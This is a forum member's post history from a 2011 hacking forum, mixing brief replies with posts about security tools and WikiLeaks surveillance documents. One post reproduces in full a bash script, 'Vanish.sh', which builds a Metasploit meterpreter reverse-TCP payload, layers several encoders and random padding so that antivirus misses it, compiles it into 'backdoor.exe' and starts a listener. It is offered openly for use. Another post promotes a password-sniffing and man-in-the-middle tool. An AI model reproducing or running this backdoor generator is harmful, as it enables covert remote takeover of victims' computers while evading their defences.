Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - noob

Pages: 1 ... 6 7 [8] 9 10 ... 12

106

General discussion / Re: Exactly what is hacking?

« on: December 31, 2011, 08:44:12 am »

hacking is shit,there is a one life and its stupid to spend it on this 19 inch lcd figuring out how TCP work till world falling apart around us....
just some thouts after long time out of the box

107

General discussion / Re: Close TPC/IP connections with remote ip and port

« on: December 31, 2011, 08:37:25 am »

X-netstat!

108

Security Tools / Fully Undetectable Backdoor generator for Metasploit

« on: December 16, 2011, 06:23:56 pm »

Security Labs Experts from Indian launch an automated Anti-Virus and Firewall Bypass Script. Its an Modified and Stable Version in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:
In order to be able to compile the generated payload we must install the following packages ; Mingw32 gcc which you can install by :
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
After the installation we must move our shell-script - Vanish.sh - to default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended Seed Number = 7000 and Number of Encode = 14 .
Note: By default Script Generates Reverse TCP Payload but you can change it some modifications in Script [vanish.sh]. Virus Scan Report of Backdoor shows that its almost undetectable by most of the Antivirus programs.Code:

Code: [Select]

#!/bin/bash
# check if file exist that is msfpayload, msfcli etc...
echo "************************************************************"
echo "    Fully Undetectable Metasploit Payload generaor Beta     "
echo "        Original Concept and Script by Astr0baby            "
# Thanks to astr0baby ;)
echo "     Stable Version of Script is Edited by Vanish3r         "
echo "    Video Tutorial by Vanish3r - www.securitylabs.in        "
echo " Powered by TheHackerNews.com and securitylabs.in           "
echo "************************************************************"
# run as root
if [ "$(id -u)" != "0" ]; then
   echo "This script must be run as root" 1>&2
   exit 1
fi
ping localhost -c 5 >nul

# Giving Fresh new start so removing old junk
rm -rf seclabs
# if  builtin type -p i686-w64-mingw32-gcc > /dev/null ; then 
# else echo "Please install by Command: apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils"
# echo "exiting.....";  exit
# fi
echo "Network Device On your Computer :"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "Which Interface to use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "How many times you want to encode ? 1-20 : \c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "Current Ip is : $IP"
ping localhost -c 5 >nul
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mkdir seclabs
mv test.c seclabs
cd seclabs
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
#Cleanup of junk useless files :P
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2 
rm -f temp3
rm -f temp4
rm -f nul 

# compiling..
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe backdoor.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in seclabs subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
ping localhost -c 5 >nul
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port E

109

Tutorials / Re: Become an antivirus.

« on: December 05, 2011, 09:20:57 pm »

Dude AutoRun for USB drive is disabed by default in Windows 7 so first half of your tutorial is outdated,its not going to happen ,no need to prevent it

110

Tutorials / Re: Become an antivirus.

« on: December 05, 2011, 04:53:26 pm »

Quote from: iAmLuFFy on December 05, 2011, 10:34:10 am

Are you kidding..
all these steps are for xp,2003,vista,7,some on 2008, and might work on win8 also..

Realy?
Autorun is disabled on ,Vista,2008,Windows 7,and they had UAC,so you cant compare them with XP.All this shit you write is mostly for XP /

111

Tutorials / Re: Become an antivirus.

« on: December 05, 2011, 02:36:13 am »

Tricks for Windows XP,this would be very usefull 5-10 years in back

112

Hacking and Security / WikiLeaks: The Spy Files

« on: December 01, 2011, 10:25:48 pm »

The ‘Spy Files’: How safe are your emails and phone calls?

Mass interception of entire populations is not only a reality, it is a secret new industry spanning 25 countries....

The 21st-century surveillance industry is hi-tech, sophisticated and terrifyingly pervasive, it is revealed in more than 200 brochures, presentations and other marketing materials published today by WikiLeaks and Privacy Internacional
The gear on sale falls into four categories: location tracking of mobile phones and vehicles; hacking into computers and phones to monitor every keystroke; recording and storage of what’s being said on an entire telecommunication networks; and the analysis of vast swathes of data to track individual users....

Code: [Select]

http://wikileaks.org/the-spyfiles.html
Price list:

Code: [Select]

http://wikileaks.org/spyfiles/files/0/204_GRIFFCOMM-200802-PRICELIST.pdf
Brochure:

Code: [Select]

http://wikileaks.org/spyfiles/list/document-type/brochure.html
The Map:

Code: [Select]

http://wikileaks.org/The-Spyfiles-The-Map.html
Manuals:

Code: [Select]

http://wikileaks.org/spyfiles/list/document-type/manual.html
GSM/UMTS Grabber:

Code: [Select]

http://wikileaks.org/spyfiles/files/0/87_ALTRON-GRABBER.pdf

113

Security Tools / Intercepter-NG New Sniffing Tool

« on: November 27, 2011, 02:53:51 am »

[Intercepter-NG] offers the following features:

+ Sniffing passwords\hashes of the types:
ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP\WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE
+ Sniffing chat messages of ICQ\AIM\JABBER\YAHOO\MSN\IRC\MRA
+ Promiscuous-mode\ARP\DHCP\Gateway\Smart Scanning
+ Raw mode (with pcap filter)
+ eXtreme mode
+ Capturing packets and post-capture (offline) analyzing
+ Remote traffic capturing via RPCAP daemon
+ NAT
+ ARP MiTM
+ DNS over ICMP MiTM
+ DHCP MiTM
+ SSL MiTM + SSL Strip

Works on Windows NT(2K\XP\2k3\Vista\7).

Download and more info:

Code: [Select]

http://intercepter.nerf.ru/
Demo:

Code: [Select]

http://www.youtube.com/watch?v=DJAVwhDOqyk

114

Hacking and Security / Web App Pentesting - PenTest Magazine

« on: November 23, 2011, 08:39:36 pm »

Download and more info:

Code: [Select]

http://pentestmag.com/brand-new-web-app-pentesting/

115

Security Tools / Re: PHP Vulnerability Hunter

« on: November 21, 2011, 02:24:55 am »

Quote from: ovi_x on November 21, 2011, 01:52:58 am

the running of csc.exe an dll tampering

csc.exe is the.NET C# compiler and important part of the .NET Framework so its a trusted process
in this case

116

Security Tools / Re: PHP Vulnerability Hunter

« on: November 21, 2011, 01:37:44 am »

Quote from: ovi_x on November 21, 2011, 01:33:58 am

C# aplication shame on me for running before disasmbeling ,

Why,something suspition inside?

117

Security Tools / PHP Vulnerability Hunter

« on: November 20, 2011, 11:39:49 pm »

What is PHP Vulnerability Hunter?
This is the application that detected almost all of the web application vulnerabilities listed on the advisories page. PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool capable of triggering a wide range of exploitable faults in PHP web applications. Minimal configuration is necessary to begin a scan; PHP Vulnerability Hunter doesn’t even need a user specified starting URI.
How does it work?
At the core of the PHP Vulnerability Hunter scan algorithm is dynamic program analysis. Unlike many vulnerability scanners and fuzz tools that rely on static analysis, PHP Vulnerability Hunter analyzes the program as it’s running to get a clear view of all input vectors. That means better code coverage and as a result greater confidence in code security.
Download:

Code: [Select]

http://code.google.com/p/php-vulnerability-hunter/downloads/listMore info:

Code: [Select]

http://www.autosectools.com/PHP-Vulnerability-Scanner

118

General discussion / Re: FileSonic, FileServer, Wupload Premium...

« on: November 19, 2011, 04:24:28 am »

i wana a coockie

119

Operating System / Re: Proj3ct Pho3nix

« on: November 17, 2011, 02:58:47 am »

Quote from: Kulverstukas on March 27, 2011, 03:36:17 pm

Probably because it would suck (to change MAC on windows you need to screw with registry and reboot the computer. Not very convenient) but we could try